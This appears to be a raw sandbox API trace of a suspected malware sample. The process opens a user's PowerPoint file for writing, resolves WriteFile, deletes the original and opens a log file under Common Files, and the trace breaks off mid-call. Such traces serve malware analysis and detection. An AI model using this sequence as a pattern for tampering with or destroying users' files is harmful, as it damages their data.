1 [0036.260] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.260] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.260] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\JIof8cjEeKxRyV.pptx", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x535c5c40, ftCreationTime.dwHighDateTime=0x1d5bf6d, ftLastAccessTime.dwLowDateTime=0xf2c4c3b0, ftLastAccessTime.dwHighDateTime=0x1d5c573, ftLastWriteTime.dwLowDateTime=0xf2c4c3b0, ftLastWriteTime.dwHighDateTime=0x1d5c573, nFileSizeHigh=0x0, nFileSizeLow=0x7df0, dwReserved0=0x0, dwReserved1=0x777648, cFileName="JIof8cjEeKxRyV.pptx", cAlternateFileName="JIOF8C~1.PPT")) returned 0x7c2100 [0036.260] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0036.260] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0036.260] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0036.260] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0036.260] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0036.260] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.260] CharLowerBuffW (in: lpsz="byte[32240]", cchLength=0xb | out: lpsz="byte[32240]") returned 0xb [0036.261] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.261] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0036.261] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0036.261] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0036.261] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.261] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0036.261] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0036.261] FreeLibrary (hLibModule=0x76b40000) returned 1 [0036.262] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0036.262] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0036.262] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0036.262] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0036.262] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0036.262] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0036.262] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0036.262] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0036.262] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0036.262] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0036.262] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0036.262] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0036.262] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0036.262] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0036.262] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0036.262] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0036.262] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0036.262] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0036.262] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0036.262] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0036.262] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0036.262] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0036.262] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0036.262] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0036.262] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0036.262] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0036.262] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0036.262] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0036.262] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0036.262] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.262] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.262] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.263] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0036.263] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.263] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.263] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.263] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.263] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.263] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.263] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.263] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.263] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.263] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.263] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.263] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.263] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.263] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.263] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.263] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.263] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0036.263] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0036.264] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\JIof8cjEeKxRyV.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\jiof8cjeekxryv.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0036.264] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0036.264] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0036.264] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0036.264] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0036.264] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0036.264] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0036.264] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0036.264] FreeLibrary (hLibModule=0x76e10000) returned 1 [0036.264] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.264] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0036.264] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0036.264] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0036.264] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.264] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0036.264] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0036.264] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.264] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0036.264] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0036.264] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0036.264] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.264] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0036.264] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0036.264] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da138 [0036.264] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0036.264] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0036.264] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0036.264] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.265] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0036.265] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0036.265] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0036.265] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0036.265] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0036.265] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0036.265] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0036.265] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0036.265] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa) returned 0x88ccb8 [0036.265] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x88ccb8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0036.265] FreeLibrary (hLibModule=0x76e10000) returned 1 [0036.265] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.265] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0036.265] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0036.265] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0036.265] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.265] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0036.265] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0036.265] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.265] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0036.265] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0036.265] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.265] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0036.265] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0036.266] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0036.266] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.266] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0036.266] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0036.266] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0036.266] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0036.266] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0036.266] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0036.266] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.266] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0036.266] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af538 [0036.266] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0036.266] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0036.266] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0036.266] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0036.266] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0036.266] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0036.266] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889a90 [0036.266] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x889a90, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0036.266] FreeLibrary (hLibModule=0x76e10000) returned 1 [0036.266] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.266] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0036.266] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0036.266] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0036.266] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.266] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0036.267] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0036.267] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.267] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0036.267] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0036.267] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0036.267] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0036.267] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\JIof8cjEeKxRyV.pptx", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\JIof8cjEeKxRyV.pptx", lpFilePart=0x0) returned 0x4d [0036.267] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\JIof8cjEeKxRyV.pptx", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x535c5c40, ftCreationTime.dwHighDateTime=0x1d5bf6d, ftLastAccessTime.dwLowDateTime=0xf2c4c3b0, ftLastAccessTime.dwHighDateTime=0x1d5c573, ftLastWriteTime.dwLowDateTime=0x15536160, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x7df0, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="JIof8cjEeKxRyV.pptx", cAlternateFileName="JIOF8C~1.PPT")) returned 0x7c2100 [0036.267] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\JIof8cjEeKxRyV.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\jiof8cjeekxryv.pptx")) returned 1 [0036.268] FindNextFileW (in: hFindFile=0x7c2100, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x535c5c40, ftCreationTime.dwHighDateTime=0x1d5bf6d, ftLastAccessTime.dwLowDateTime=0xf2c4c3b0, ftLastAccessTime.dwHighDateTime=0x1d5c573, ftLastWriteTime.dwLowDateTime=0x15536160, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x7df0, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="JIof8cjEeKxRyV.pptx", cAlternateFileName="JIOF8C~1.PPT")) returned 0 [0036.268] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0036.269] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.269] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.269] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0036.269] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0036.269] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0036.269] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0036.269] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0036.269] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0036.269] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0036.269] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0036.269] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0036.269] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0036.269] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0036.269] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0036.269] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0036.269] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0036.269] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.269] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.269] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ptx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.269] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pptx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.269] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pptx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0036.269] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0036.269] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0036.269] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0036.269] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0036.269] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0036.270] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0036.270] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0036.270] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0036.270] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0036.270] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0036.270] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0036.270] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0036.270] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0036.270] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0036.270] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0036.270] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0036.270] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, 